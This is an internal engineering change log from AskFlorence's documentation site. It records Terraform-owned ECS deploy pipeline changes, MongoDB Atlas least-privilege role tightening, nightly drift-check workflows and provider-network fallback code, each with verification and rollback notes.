Skip to content
AskFlorence
Main Navigation ArchitectureFlorence AIAgentsMembersAgent PlatformValidationInfrastructure

Appearance

Sidebar Navigation

Overview

Home

Glossary

System Architecture

Consumer & Agent Flow

Florence AI

Overview

Principles

Runtime

Tool surface

Adding a tool

Tool registry

Knowledge: SBC scenarios & CSR

Voice

Evals & observability

Provider risk & portability

Outage playbook

Roadmap

Build plan

Agents

Overview

Workflows & pain points

Members

Overview

Medicaid coverage gap

Carriers

Overview

Marketplaces

Overview

Agency

Overview

Regulations

Overview

Agent Platform

Overview

Auth Architecture

MongoDB Permissioning

Compliance Model

Data Models

Data Sources

Overview

CMS Marketplace API

CMS dependency map

PUF Data

State Subsidies

SBE Ingestion Playbook

SBE State Watchouts + Decisions

CA Phase C/D Playbook

NY Phase C/D Playbook

Validation

Overview

Methodology

APTC Formula

California 2026

New York 2026

CAPS Formula

Scenario Results

Infrastructure

Account Inventory

AWS Setup Runbook

AWS Organizations

CloudTrail

GuardDuty

Security Hub

Config

CloudFront + WAFv2

Data sources & ingest

Phase 4 DNS

Change Log

Vulnerability Management

MongoDB Setup

Access Control

Data Classification

Documentation Hosting

Post-deploy Smoke

Development

Preflight (local CI mirror)

Testing strategy

Compliance

Overview (auditor entry point)

SOC 2 Control Mapping

HIPAA Control Mapping

CMS EDE Appendix A Mapping

Risk Assessment

Encryption Policy

Data Retention Policy

Privacy Impact Assessment

Consent Capture & Versioning

Incident Response Plan

Access Control Policy

Marketing vs. Portal Analytics

Vendor / Subprocessor Register

Dependency Vulnerability Policy

BAA / Compliance Evidence

Compliance-Automation Integration

Compliance-Automation Vendor Evaluation

Penetration Test Reports

Architecture

Portal entry handoff

Mobile app strategy

Deferred architecture decisions

Session cookie architecture

Share flows

Decisions (ADRs)

Index

0001 — Atlas project isolation

0002 — Append-only audit log

0003 — Narrow-scoped Mongo users

0004 — Cross-cluster Atlas PrivateLink

0005 — Delayed-job architecture

0006 — Mongo user simplification

0007 — Terraform owns ECS task def

0008 — E2E testing strategy

0009 — Self-hosted analytics + observability (superseded)

0010 — PostHog HIPAA Cloud (supersedes 0009)

Runbooks

Security Incident Response

Break-Glass Root Login

Onboard Team Member

Offboard Team Member

Atlas user provisioning

Deploy via Terraform (ENG-277)

Rollback via Terraform (ENG-277)

S3 data bucket migration (planned Phase 11)

Access Reviews

2026-Q2 Review

Session log

Index

2026-04-23 — Phase 10 DNS cutover

2026-04-22 — Phase 8 prod AWS mirror

2026-04-22 — Phase 7 Atlas VPC peering

2026-04-22 — Phase 6 CloudFront + WAF

2026-04-21 — Phase 5 staging go-live

2026-04-17 — Atlas staging

Briefs

Index

Member portal plan (ENG-187)

2026-04-16/17 handoff

2026-04-17 Atlas handoff

System briefing (2026-04-17)

Creative AdBundance proposal brief

Creative AdBundance analytics brief

ElevenLabs RN integration research

Policies

Overview

On this page

Infrastructure Change Log ​

Purpose: Timestamped record of every meaningful infrastructure change. SOC 2 CC8.1 (Change Management) and CMS EDE Phase 3 change-control evidence.

Conventions:

  • Newest entries at the top.
  • Every entry: ISO-8601 UTC timestamp, actor, change summary, affected resources/accounts, linked issue/PR/commit, rollback note if applicable.
  • Cross-check against CloudTrail in the askflorence-log-archive account for the authoritative machine-readable record.

2026-05-13T10:30Z — ENG-277 PR 3: cleanup + ADR 0007 + deploy/rollback runbooks ​

Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-pr3-cleanup, PR against main); agent: Claude Opus 4.7 (1M context)

Linked: ENG-277 (PR 3 of 3 — final).

What shipped ​

Deletions (3 files, ~600 lines retired):

  • .github/workflows/atlas-task-def-drift.yml — ENG-272 Layer 5 nightly drift checker. No longer needed with Terraform owning container_definitions end-to-end.
  • scripts/audit/atlas-task-def-drift.ts — the drift-checker script.
  • scripts/ops/patch-task-def-add-secret.sh — the manual remediation helper.

Doc updates:

  • scripts/audit/generate-access-matrix-docs.ts — "Four CI guards" → "Three CI guards"; references ADR 0007.
  • infra/atlas/access-matrix.ts — Layer 5 reference removed from CI-guard list.
  • docs/infrastructure/atlas-access-matrix.md — regenerated via npm run docs:atlas.
  • docs/.vitepress/config.ts — ADR + Runbooks sidebars extended.
  • docs/adr/index.md — 0007 added.

New docs:

  • docs/adr/0007-terraform-owns-ecs-task-def.md — Accepted ADR.
  • docs/runbooks/deploy-via-terraform.md — operational runbook.
  • docs/runbooks/rollback-via-terraform.md — rollback procedures.

Rollback ​

Pure revert. No live-state implications.


2026-05-13T10:00Z — ENG-277 PR 2: mirror Terraform-driven deploy to staging ​

Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-pr2-staging, PR against main); agent: Claude Opus 4.7 (1M context)

Linked: ENG-277 (PR 2 of 3). Follows ENG-277 PR 1 prod ship (2026-05-13T02:23Z) which retired the silent-secret-binding-drift bug class on prod. PR 2 brings staging onto the same pipeline.

Why ​

Prod has been stable on the Terraform-driven pipeline since 2026-05-13T07:08Z (deploy run 25784042404 + multiple successful subsequent deploys). The same structural fix needs to land on staging so the ENG-279-shape drift cannot recur there either. Staging-side IAM was preemptively wired during the ENG-308 / ENG-309 / ENG-313 chain — both envs already have parity on AssumeRoleBackend + TerraformRefreshReadOnly + DeploySecretsRead + ValidateSecretsRole.

What shipped ​

Three files touched (mechanical mirror of PR 1):

  • .github/workflows/deploy-staging.yml — deleted the 2-step legacy chain (Download current task definition + Update task definition with new image) and the Deploy to ECS step. Inserted 5 new steps between the ensure-indexes block and the scale-to-1 step: hashicorp/setup-terraform@v3 (terraform_version 1.14.0), terraform init, terraform validate, terraform apply -auto-approve -var app_image_uri=<ecr-uri>, timeout 600 aws ecs wait services-stable. The 10-min cap mirrors the legacy wait-for-minutes: 10 semantics. Ensure-indexes block (lines 110-194 post-edit) untouched.
  • infra/envs/staging/ecs.tf — replaced hardcoded container_image = "public.ecr.aws/docker/library/nginx:alpine" with container_image = var.app_image_uri.
  • infra/envs/staging/variables.tf (NEW) — declares app_image_uri variable with the same nginx placeholder default as prod's variables.tf.

Pre-work probe ​

Captured against live staging state + current live image SHA. Diff verified clean:

# module.ecs_app.aws_ecs_service.this will be updated in-place
# module.ecs_app.aws_ecs_task_definition.this must be replaced
Plan: 1 to add, 1 to change, 1 to destroy.

ECS task def "replace" is normal AWS provider behavior (immutable resource; registers new revision). No CloudFront / IAM / unrelated drift surfaced. Apply will succeed end-to-end because staging IAM has parity with prod (proven by the prod deploys that have run since ENG-308).

Verification ​

PR-time CI:

  • terraform fmt -check -recursive infra/envs/ clean
  • npm run preflight -- --quick — all 4 checks PASS expected

Post-merge:

  • Push main → staging branch fires deploy-staging.yml automatically
  • New workflow: build/push → ensure-indexes (legacy CLI path, unchanged) → Terraform init/validate/apply → aws ecs wait services-stable (10 min cap) → ALB smoke → post-deploy smoke 11/11 PASS
  • Live staging task def shows new revision, image SHA matches, secretCount = 16 (all bindings present including MONGODB_WRITE_URI + MONGODB_AUDIT_WRITE_URI which were the originally-drifted secrets on staging)
  • https://stage.askflorence.health/api/health returns 200

Rollback ​

Same shape as PR 1's rollback:

  • Apply fails: circuit breaker keeps service on old revision; git revert <PR2> + merge; investigate workflow log.
  • Apply succeeds but new task unhealthy: aws ecs update-service --cluster askflorence-staging --service askflorence-staging-app --task-definition askflorence-staging-app-task:<old-N>; wait stable; revert.
  • Bad image: re-push to staging branch with previous good SHA; same Terraform-owned pipeline rebuilds + applies known-good image. Fix forward.

2026-05-12T20:30Z — ENG-277 PR 1: drop lifecycle.ignore_changes = [container_definitions] on prod ECS task def; Terraform owns the whole task def via terraform apply -var app_image_uri=<sha> ​

Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-terraform-owns-task-def, PR against main); agent: Claude Opus 4.7 (1M context)

Linked: ENG-277 (Phase 2 / Option C structural fix); follow-up to ENG-272 (Layers 1-4, PR #150) and ENG-272 Layer 5 (PR #162); same bug class recurred 2026-05-11 (MONGODB_REFERENCE_URI) and 2026-05-12 (MONGODB_WRITE_URI + MONGODB_AUDIT_WRITE_URI on staging via ENG-279 PR #170). Prod-only change in PR 1. Staging stays on the legacy CI chain until PR 2 ships (24h after PR 1 deploy + soak — per the new universal prod-first deploy rule, staging is the YC demo link and cannot regress).

Why ​

The ECS app module pins lifecycle.ignore_changes = [container_definitions] so CI can register new task-def revisions on each deploy without Terraform fighting it. The block is all-or-nothing on the JSON-encoded container_definitions attribute — when Terraform source adds a new secrets[] or environment[] entry, Terraform silently stops tracking it, and the deploy workflow's describe-task-definition → render-task-definition chain only swaps the image. The new binding never lands on the running task.

Recurrences in the last ten days:

  • 2026-05-11 (ENG-272): MONGODB_REFERENCE_URI missing on staging → "Tyler Wood not covered" wrong on the YC application surface.
  • 2026-05-12 (ENG-279): MONGODB_WRITE_URI + MONGODB_AUDIT_WRITE_URI missing on staging task def revision 75 → POST /api/waitlist 500 on the YC link smoke; manual remediation via scripts/ops/patch-task-def-add-secret.sh registered revision 77.
  • ENG-249 + ENG-271 earlier (resume token, scheduler vars).

Pattern interval: ~24 hours. ENG-284 (PR #171) doubled down on detection (Phase-1 write-path smoke + 3 PR-time guards, including ecs-task-def-coverage). Detection layers do their jobs but can't prevent regressions that ship between checkpoints. ENG-277 retires the bug class by structural change: Terraform owns the task definition end-to-end, and the deploy workflow drives it via -var app_image_uri=<sha>.

What shipped (PR 1 — prod only) ​

Five files touched:

  • infra/modules/ecs-service/main.tf — deleted the lifecycle { ignore_changes = [container_definitions] } block on aws_ecs_task_definition.this. Shrank aws_ecs_service.this ignore_changes from [desired_count, task_definition] → [desired_count] (kept desired_count so the workflow's first-deploy 0→2 scaling step doesn't fight Terraform). Inline terraform fmt canonicalized pre-existing alignment in the locals { } block + the KmsDecryptForSecrets Sid (whitespace only, no semantic change).

  • infra/envs/prod/ecs.tf — replaced hardcoded container_image = "public.ecr.aws/docker/library/nginx:alpine" with container_image = var.app_image_uri. Comment block updated to explain Terraform now owns the image lifecycle.

  • infra/envs/prod/variables.tf (NEW) — declares variable "app_image_uri" with default = "public.ecr.aws/docker/library/nginx:alpine" (same placeholder; preserves no-arg terraform apply behavior for engineers modifying networking, KMS, etc.).

  • infra/envs/prod/github-oidc.tf — added Sid = "AssumeRoleBackend" statement granting sts:AssumeRole on arn:aws:iam::778477254880:role/TerraformBackendRole. This is the critical IAM gap the pre-work probe surfaced — the backend config in versions.tf declares assume_role { role_arn = "TerraformBackendRole" }, but the prod OIDC role's inline policy had direct S3/DDB/KMS perms on mgmt-account state resources WITHOUT the AssumeRole statement. Latent because the current deploy workflow doesn't run Terraform; surfaces immediately when PR 1 adds the Terraform apply step. Mirrored to staging in PR 2.

  • .github/workflows/deploy-prod.yml — deleted the 3-step legacy chain (Download current task definition, Update task definition with new image, Deploy to ECS). Inserted 4 new steps between the ensure-indexes block and the scale-to-2 step:

    1. hashicorp/setup-terraform@v3 pinned terraform_version: 1.14.0, terraform_wrapper: false
    2. terraform init -input=false in infra/envs/prod
    3. terraform validate
    4. terraform apply -auto-approve -input=false -var "app_image_uri=$IMAGE_URI" (where the GitHub Actions step references the build output via the standard steps.build-image.outputs.image-uri expression)
    5. timeout 900 aws ecs wait services-stable — mirrors the legacy wait-for-service-stability: true, wait-for-minutes: 15 behavior the removed amazon-ecs-deploy-task-definition step provided.

    The ensure-indexes pre-deploy block (lines 105-189 post-edit) is kept verbatim on the legacy register-task-definition + run-task CLI path; it still has its own lifecycle.ignore_changes = [container_definitions] in infra/modules/ecs-ensure-indexes/main.tf. Different blast radius (one-shot pre-deploy task, exits non-zero on failure aborting the deploy with the old service-tied task def still active) and explicit out of scope for ENG-277. Tracked as a symmetric follow-up.

    The ENG-284 smoke expansion (lines 289-330 post-edit: Setup Node, Install smoke deps, Fetch smoke secrets, Post-deploy smoke) is preserved unchanged.

No staging changes in PR 1. .github/workflows/deploy-staging.yml, infra/envs/staging/ecs.tf, and the staging OIDC policy are untouched. Staging continues to use the legacy CI chain (describe-task-definition → render-task-definition → deploy-task-definition) until PR 2 ships after the 24h prod soak gate.

Pre-work terraform plan probe (local SSO, no commits, no apply) ​

Probe shape captured against live prod state with module changes applied locally and current live image SHA passed as -var. Confirmed the diff before opening PR 1.

# aws_iam_role_policy.github_actions_deploy will be updated in-place
# module.ecs_app.aws_ecs_service.this will be updated in-place
# module.ecs_app.aws_ecs_task_definition.this must be replaced
Plan: 1 to add, 2 to change, 1 to destroy.
  • IAM policy update — adds the AssumeRoleBackend Sid.
  • ECS service update — task_definition ARN swaps from live :75 → (known after apply).
  • ECS task def "replace" — normal AWS provider behavior for an immutable resource. Terraform registers a new revision (76+) with the new image AND the full Terraform-source content, then deregisters the state-tracked revision 1 (the bootstrap). Live revisions 2-75 remain INACTIVE for rollback safety. Service deployment_circuit_breaker { enable = true, rollback = true } handles the rolling deployment with auto-rollback on health failure.

Drift finding from the probe: MONGODB_AUDIT_WRITE_URI is declared in Terraform source (infra/envs/prod/ecs.tf) but was missing from live prod task def revision 75 — same shape as ENG-279's staging drift, but on prod (latent; no current code path reads it on prod, so no user-facing impact yet). PR 1's first apply silently fixes the drift by landing the binding on the new revision.

Verification gates ​

PR-time CI:

  • atlas-access-matrix-guard.yml — passes (no Mongo URI source changes).
  • ecs-task-def-coverage.yml (ENG-284) — passes (no secret bindings added/removed).
  • build-check.yml (ENG-284) — passes (no app code changes).
  • validate-secrets.yml — passes.

Post-merge prod deploy (via gh workflow run deploy-prod.yml --ref main):

  1. Build + push image to 039624954211.dkr.ecr.us-east-1.amazonaws.com/askflorence-app:<sha>.
  2. Ensure-indexes runs (legacy CLI path, unchanged).
  3. NEW: Setup Terraform 1.14.0 → terraform init (assumes TerraformBackendRole via the new OIDC Sid) → terraform validate → terraform apply -auto-approve -var app_image_uri=.... Apply registers task def revision 76 (or higher) with full source content; updates service task_definition to the new ARN.
  4. aws ecs wait services-stable --cluster askflorence-prod --services askflorence-prod-app returns within 15 min (typically 3-8 min for 2 tasks).
  5. ALB smoke against origin.askflorence.health/api/health — 200.
  6. npx tsx scripts/audit/post-deploy-smoke.ts — 11 checks (read-only 6 + ENG-284 write-path 5) PASS.
  7. Manual eyeball: aws ecs describe-task-definition --task-definition askflorence-prod-app-task --query 'taskDefinition.{revision:revision,image:containerDefinitions[0].image,envVarCount:length(containerDefinitions[0].environment),secretCount:length(containerDefinitions[0].secrets)}' — revision N+1, image SHA matches commit, env count matches Terraform source, secret count = 16 (was 15 live on revision 75; the addition is MONGODB_AUDIT_WRITE_URI).
  8. Full member + agent smoke flows against https://askflorence.health (CLAUDE.md procedures; synthetic emails taha+smoke-{plan-interest,agent}-2026-05-12-pr1prod@askflorence.health; cleanup against prod Atlas + HubSpot portal 246003491).

Rollback ​

Three scenarios:

  • Apply fails mid-flight (e.g. IAM gap, plan diverges from probe): circuit breaker keeps service on revision 75; git revert <PR1 commit>; merge revert PR; investigate workflow log.
  • Apply succeeds but new task unhealthy (circuit breaker DIDN'T catch the issue): aws ecs update-service --cluster askflorence-prod --service askflorence-prod-app --task-definition askflorence-prod-app-task:75; wait stable; revert.
  • Bad image (build passes, runtime errors): re-dispatch deploy-prod.yml with ref = previous good SHA; same Terraform-owned pipeline rebuilds + applies a known-good image. Fix forward, no revert.

Soak gate ​

24h before PR 2 (staging) may merge. Monitor aws logs tail /aws/ecs/askflorence-prod-app --since 1h --format short at 1h / 4h / 12h / 24h. runningCount == desiredCount == 2 must hold. Hit /api/health and /api/eligibility hourly.

Out-of-scope follow-up ​

infra/modules/ecs-ensure-indexes/main.tf lines 179-181 still have lifecycle { ignore_changes = [container_definitions] }. Same bug class but different exposure (one-shot pre-deploy task with visible non-zero exit). Symmetric follow-up to file as a separate issue after PR 3 lands.


2026-05-11 — ENG-257 re-baseline: role_reader_reference 4-collection scope accepted as permanent (won't-fix) ​

Actor: taha.abbasi via ~/Developer/askflorence/.claude/worktrees/eager-dirac-acdd3e/ worktree (branch claude/eager-dirac-acdd3e, doc-hygiene PR against main); agent: Claude Sonnet 4.5

Linked: ENG-257 closed as not planned; GH #122 closed; GH #120 closeout comment cross-linked; ADR 0004 amendment 2026-05-11. No Atlas changes. No CI changes. No deploys.

Why ​

role_reader_reference was widened from 2 → 4 collections on 2026-05-09 to support the §1311 re-validation audit (ENG-230). ENG-257 was filed as the planned narrow-back once the audit cycle shipped. ENG-230 closed 2026-05-09. Re-examining the architecture on 2026-05-11: the wider scope is the role's actual permanent purpose, not a temporary tradeoff. All four collections are part of the §1311 / MRF reference dataset (same data classification, same network path); audit re-validation is a recurring responsibility (ENG-231 refresh cadence is open and will exercise the same access path). Narrow-then-re-widen on every future audit cycle is operational churn with zero posture benefit. Re-baseline the documentary framing to agree with the live role's responsibility.

What shipped ​

This is pure doc + comment hygiene. The Atlas role state, the matrix collections array, and every CI guard are unchanged. The only deltas are explanatory:

  • infra/atlas/access-matrix.ts — replaced the 7-line // TEMPORARY (added 2026-05-09 — narrow back ...) comment block above the plans + mrpuf_issuers_staging entries with a permanent justification comment.
  • src/lib/db.ts — same treatment on the parallel block in STAGING_REFERENCE_READ_COLLECTIONS.
  • docs/adr/0004-cross-cluster-atlas-privatelink.md — appended "Amendment 2026-05-11 (ENG-257 closeout)" section explaining the 4-collection canonical scope and why.
  • docs/runbooks/atlas-user-provisioning.md — updated Step B's atlas customDbRoles create role_reader_reference example to use the 4-collection canonical scope; updated the prose paragraph to reflect the role's two-purpose responsibility (runtime tier-fallback + audit re-validation).
  • docs/infrastructure/change-log.md — this entry.

Verification ​

  • npx tsc --noEmit — clean (no source changes other than a comment block).
  • npx tsx scripts/audit/access-matrix-env-coverage.ts — pass (no env-var bindings shifted).
  • npx tsx scripts/audit/access-matrix-doc-sync.ts — pass (doc cross-refs unchanged).
  • Nightly drift check (scripts/audit/staging-cluster-drift.ts) — already green since 2026-05-09 (matrix matches Atlas state); confirmed unchanged.
  • Post-merge smoke (/api/drugs/covered, /api/providers/covered) — runs on the existing Deploy prod workflow without modification; will pass because no live state changes.

Rollback ​

Comment-only PR has no live-system rollback. If a future cycle wants to re-narrow to 2 collections + provision a dedicated audit_reader user, the original recipe is preserved in GH #122's description and in this change-log's prior entry (2026-05-09T06:18Z).


2026-05-09T06:18Z — CI guard Phase 2 shipped (live nightly drift check) + cross-cluster reader role tightened to per-collection scoping ​

Actor: taha.abbasi via ~/Developer/askflorence/.claude/worktrees/practical-ride-fa5b6f/ worktree (branch claude/practical-ride-fa5b6f, will push to origin/ci-guard-phase-2); agent: Claude Opus 4.7 (1M context)

Linked: #100 / ENG-239 Phase 2 of 2 (Phase 1 shipped 2026-05-08T04:18Z entry below); ADR 0004 Consequences section updated; brief at docs/briefs/overnight-ci-guard-phase-2.md. No deploys — branch-only ship per brief constraints (cron-scheduled audit workflow, not PR-gated).

Why ​

Phase 1 (static guard, shipped 2026-05-08) catches code-level drift — every PR is rejected if it adds a getReferenceDb() call against a non-allow-listed collection. Phase 1 does NOT catch runtime drift: someone connecting to staging Atlas via mongosh and creating a PHI collection by hand; an out-of-band ingest writing a sensitive collection; a privilege expansion via Atlas Admin UI on the cross-cluster app_read_staging user. Phase 2 closes that gap by inspecting the actual Atlas state nightly and flagging drift as a P1 GitHub issue.

A pre-existing follow-up from the Phase 11 runbook (docs/runbooks/atlas-user-provisioning.md line 200) — "if a future audit requires per-collection scoping, replace this with a custom role role_reader_reference with FIND@askflorence.formularies_staging,FIND@askflorence.providers_staging" — was the natural way to give Phase 2's audit something specific to verify. Tightening + audit ship as one coherent unit.

What shipped ​

Atlas state changes (staging project 69e31af12fd2c0aef51bbb41):

  • Created custom role role_reader_reference with FIND action on askflorence.formularies_staging + askflorence.providers_staging ONLY. No other actions, no inheritedRoles.
  • Swapped app_read_staging user from built-in read@askflorence (whole-DB scope) → role_reader_reference@admin (per-collection scope). Atlas applied without restart; ~30s propagation.

Code (worktree branch claude/practical-ride-fa5b6f):

  • src/lib/db.ts — added STAGING_REFERENCE_READ_COLLECTIONS constant (formularies_staging + providers_staging). Distinct from STAGING_ALLOWED_COLLECTIONS (10 items, "what's allowed to live on the staging cluster"); STAGING_REFERENCE_READ_COLLECTIONS is "what the cross-cluster consumer actually reads." Two lists serve different security purposes.
  • scripts/audit/staging-cluster-drift.ts (NEW) — TypeScript audit script wrapping atlas CLI subprocess (no Atlas Admin API HTTP Digest re-implementation needed; atlas CLI handles auth via MONGODB_ATLAS_PUBLIC_API_KEY + MONGODB_ATLAS_PRIVATE_API_KEY env vars in CI, falls back to atlas auth login config locally). Validates 10 violation categories: user_missing / user_role_count / user_role_name / user_role_database / role_missing / role_inherited / role_action / role_resource_db / role_resource_cluster_scope / role_collection_extra / role_collection_missing. Exit 0 + ✅ PASS on canonical state; exit 1 + ❌ FAIL with per-violation report on drift. Defense-in-depth: locally duplicates the expected-collections set so a developer can't widen the contract by editing only db.ts.
  • .github/workflows/staging-cluster-drift.yml (NEW) — cron 0 8 * * * (08:00 UTC daily) + manual workflow_dispatch. Installs MongoDB Atlas CLI on the runner, binds ATLAS_DRIFT_CHECK_PUBLIC_KEY + ATLAS_DRIFT_CHECK_PRIVATE_KEY repo secrets to the canonical MONGODB_ATLAS_*_API_KEY env-var names atlas CLI consumes automatically, runs the script. On failure(): actions/github-script@v7 opens a P1 GitHub issue (labels compliance + priority-1) titled [Drift] Staging cluster role drift detected — YYYY-MM-DD linking to the workflow run + ADR 0004 + the runbook. permissions: { contents: read, issues: write }. Intentionally NOT triggered on PR/push — Phase 1 covers code-time drift; this is a separate axis (live cluster state).

Documentation (5 files updated):

  • docs/runbooks/atlas-user-provisioning.md — Step B updated to provision the user with role_reader_reference@admin (instead of read@askflorence); rationale + emergency-rollback snippet added. New Step H — API key for nightly drift check (Phase 2): provisioning recipe, gh secret set commands, rotation cadence, drift-check rollback.
  • docs/security-compliance/soc2-control-mapping.md (then at docs/compliance/soc2/controls.md before the 2026-05-11 doc consolidation) — extended CC7.2 with new row for the live nightly check (verification + 3 synthetic violations); extended CC8.1 with new row for the role-tightening change-management posture.
  • docs/adr/0004-cross-cluster-atlas-privatelink.md — Consequences section restructured to mark both phases shipped + describe the audit posture.
  • docs/infrastructure/data-classification.md — Drift guard section restructured to mark Phase 2 shipped.
  • docs/decisions/2026-05-03-pivot-cms-api-direct.md — open-mitigations item rewritten to mark Phase 2 shipped.

No infrastructure changes (AWS, Terraform, ECS). No code paths in src/app/, src/components/, src/lib/ other than the new constant. No prod deploys. No Vercel deploys. No staging deploys. Branch-only ship per brief constraints; the audit workflow runs on cron (08:00 UTC daily) once the GH secrets are provisioned.

Verification ​

Pre-tighten baseline (apex + stage):

  • POST askflorence.health/api/drugs/covered {rxcuis:["1364441"], plan_id:"42261UT0060023", year:2026} → coverage=Covered, drug_tier=PreferredBrand, prior_authorization=false, quantity_limit=true, step_therapy=false. HTTP 200.
  • POST askflorence.health/api/providers/covered {npis:["1023023066"], plan_id:["42261UT0060023","42261UT0060026"], year:2026} → both coverage=Covered, network_tier=Preferred. HTTP 200.
  • POST stage.askflorence.health/api/drugs/covered (same body) → identical response. HTTP 200.
  • POST stage.askflorence.health/api/providers/covered (same body) → identical response. HTTP 200.

Post-tighten (60s after role swap): all 4 responses byte-identical to baseline. Cross-cluster path on prod still healthy with the narrower role; intra-cluster path on stage unaffected (uses mongodb/app-read user, not app_read_staging).

Drift script local run (via worktree's npx tsx scripts/audit/staging-cluster-drift.ts):

  • Canonical state: ✅ PASS, exit 0.
  • Synthetic violation A (extra collection — --append --privilege FIND@askflorence.agent_audit_log): ❌ FAIL, exit 1, category role_collection_extra flagging agent_audit_log. Reverted; clean state restored.
  • Synthetic violation B (wider action — --append --privilege INSERT@askflorence.formularies_staging): ❌ FAIL, exit 1, category role_action flagging INSERT. Reverted; clean state restored.
  • Synthetic violation C (extra role on user — --role role_reader_reference@admin --role read@admin): ❌ FAIL, exit 1, two categories — user_role_count (2 roles vs expected 1) + user_role_name (extra read@admin). Reverted; clean state restored.

Final state confirmation: drift script ✅ PASS; app_read_staging has exactly role_reader_reference@admin; role_reader_reference has exactly FIND@askflorence.formularies_staging + FIND@askflorence.providers_staging; final apex smoke (drugs + providers) returns canonical responses.

TypeScript: npx tsc --noEmit clean for files touched in this session (src/lib/db.ts + scripts/audit/staging-cluster-drift.ts); pre-existing unrelated errors in scripts/hubspot/* + src/lib/hubspot/* (missing @hubspot/api-client module typing) untouched and unaffected.

Compliance posture impact ​

FrameworkControlStatus
SOC 2CC7.2 (additional row) — detection of runtime privilege drift on cross-cluster readerNew row in docs/compliance/soc2/controls.md. Live nightly audit catches privilege drift the static guard cannot — Atlas Admin UI changes, out-of-band scripts, role escalation.
SOC 2CC8.1 (additional row) — change management for cross-cluster reader role privilegesNew row. Role tightened to per-collection custom role; constants duplicated between source-of-truth and audit script (defense-in-depth); quarterly review cadence aligned with STAGING_ALLOWED_COLLECTIONS.
HIPAA§164.312(a)(1) Access Control + §164.308(a)(4) Information Access ManagementReinforced via principle of least privilege — cross-cluster reader can no longer see anything in the askflorence DB beyond the 2 collections it actually consumes.
EDE Phase 3Environment separationReinforced — the runtime audit closes the gap left by code-only enforcement.

Open prerequisites (before nightly cron starts passing) ​

  • GH secrets ATLAS_DRIFT_CHECK_PUBLIC_KEY + ATLAS_DRIFT_CHECK_PRIVATE_KEY need to be provisioned before the next 08:00 UTC tick. Taha to create the Atlas Programmatic Key (Org Owner role required) scoped to Project Read Only on the staging project (NOT Org-level). Workflow ships ready to consume those secrets; first cron run will fail open (no secrets → atlas CLI auth error) until they land. Manual gh workflow run staging-cluster-drift.yml --ref ci-guard-phase-2 after provisioning to verify.

Cost outcome ​

Unchanged. CI minutes negligible (drift workflow runs once daily, completes in <1 min). No new AWS resources, no Atlas tier changes.

Outstanding follow-ups ​

  • GH secret provisioning (above) — blocks first green nightly run.
  • Quarterly review of STAGING_REFERENCE_READ_COLLECTIONS alongside STAGING_ALLOWED_COLLECTIONS per docs/security-compliance/vendor-register.md cadence — both must move in lock-step with role updates on Atlas.
  • Annual rotation of the gh-actions-staging-drift-check Atlas API key — first rotation due 2027-05-09.

2026-05-09T04:18Z — Phase D provider-network fallback shipped + facility/pharmacy autocomplete fix + CI guard Phase 1 (static check) ​

Actor: taha.abbasi via ~/Developer/ask-florence-doctor-rx/ worktree (branch doctor-rx-flow); agent: Claude Opus 4.7 (1M context)

Linked: #96 / ENG-234 Phase D shipped + closed; #100 / ENG-239 CI guard Phase 1 of 2; #106 / ENG-245 (NEW) pharmacy network lookup; #107 (NEW) drug coverage checker product idea; #108 (NEW) clear-all button. Closed: GH #17, #18, #20. Commits: 1465c6d (Phase D + autocomplete), 40a4a3a (diagnostic), 67cb315 (CI guard); Deploy run 25590973086 success in 6m43s, ECS revision 54.

Why ​

Phase 11 (yesterday's commit) wired the cross-cluster Atlas PrivateLink read path from prod to staging cluster, with drug-tier-fallback for formularies_staging. The provider mirror (providers_staging reads via the same path) was the missing other half — Phase D. Same architecture, different collection. Plus while verifying, found that the doctor-search UI hook hardcoded type: "Individual" so retail pharmacies (Walmart, Walgreens) silently filtered out — fixed alongside.

The CI guard came out of Phase 11's open-mitigations list: the staging cluster must stay non-PHI for the data-classification argument to hold (SOC 2 CC6.6 + EDE Phase 3 segregation). A future PR adding a cross-cluster read against a PHI-class collection would silently break that posture; we needed enforcement at build time.

What shipped ​

Code (commits 1465c6d + 67cb315):

  • src/lib/provider-network-fallback.ts (NEW) — lookupStagingProviderNetworks(npiPlanPairs) mirroring drug-tier-fallback.ts. Reads providers_staging via getReferenceDb(); returns Map of ${npi}|${plan_id} → network_tier. CMS coverage authoritative; staging fills the tier-omission gap.
  • src/app/api/providers/covered/route.ts — enrichment loop wired after CMS call (mirrors /api/drugs/covered).
  • src/app/api/providers/autocomplete/route.ts — server-side fan-out across Individual + Facility + Group when type is omitted or "All". Backwards-compatible: callers passing a specific type get the prior single-type behavior.
  • src/lib/hooks/use-doctor-autocomplete.ts — ProviderType union extended to include "Group" + "All"; default changed "Individual" → "All".
  • src/components/plans/CoveragePanel.tsx + src/components/plans/detail/PlanCoverageCheck.tsx — pass type: "All" with explanatory comment.
  • src/lib/db.ts — new STAGING_ALLOWED_COLLECTIONS constant (10 collections) + StagingAllowedCollection type. Source of truth for cross-cluster data-classification allow-list.
  • scripts/audit/staging-collections-guard.ts (NEW) — zero-dep regex-based static guard. Walks src/ + scripts/, finds every await getReferenceDb() binding + downstream .collection("…") calls, verifies against allow-list. Self-skip + comment-stripping defenses. Allow-list duplicated in script (defense-in-depth).
  • .github/workflows/staging-collections-guard.yml (NEW) — runs on PRs to main / staging / doctor-rx-flow + on push to main + on demand. Clear ::error:: output on failure with ADR 0004 pointer.
  • scripts/diag/check-walgreens-coverage.js (NEW, commit 40a4a3a) — diagnostic script that surfaced the pharmacy-network finding (medical services vs pharmacy network are separate data layers).

No infrastructure changes — all reads ride on the Phase 11 cross-cluster path established yesterday. No new AWS resources, no new Atlas resources.

Verification ​

Phase D end-to-end on prod:

  • POST askflorence.health/api/providers/covered with Walgreens NPI 1023023066 against issuer 42261's UT plans 42261UT0060023 + 42261UT0060026: returned coverage=Covered, network_tier="Preferred". The network_tier field is only populated by lookupStagingProviderNetworks() reading from providers_staging via the cross-cluster path. CMS returned Covered without tier; staging filled it. Sub-second latency on the AWS-backbone path.

Walmart/Walgreens autocomplete fan-out on prod:

  • POST askflorence.health/api/providers/autocomplete {"q":"Walmart","zipcode":"84094"} (no type): 13 results merging Facility (WALMART INC. NPIs) + Group (SLC WALMART EYE DOCS).
  • Same for Walgreens: 21 results merging Individual (SARAH WALGREEN — actual person named Walgreen) + Facility (WALGREENS #XXXXX).

CI guard static check:

